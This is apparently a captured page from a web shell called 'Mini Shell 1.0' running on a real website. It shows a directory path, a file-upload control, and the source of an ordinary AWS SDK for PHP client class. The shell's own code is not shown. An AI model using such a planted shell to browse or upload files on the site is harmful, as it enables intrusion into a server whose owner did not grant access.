HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/cwd/vendor/aws/aws-sdk-php/src/ConnectContactLens/
Upload File :
Current File : //proc/self/cwd/vendor/aws/aws-sdk-php/src/ConnectContactLens/ConnectContactLensClient.php
<?php
namespace Aws\ConnectContactLens;

use Aws\AwsClient;

/**
 * This client is used to interact with the **Amazon Connect Contact Lens** service.
 * @method \Aws\Result listRealtimeContactAnalysisSegments(array $args = [])
 * @method \GuzzleHttp\Promise\Promise listRealtimeContactAnalysisSegmentsAsync(array $args = [])
 */
class ConnectContactLensClient extends AwsClient {}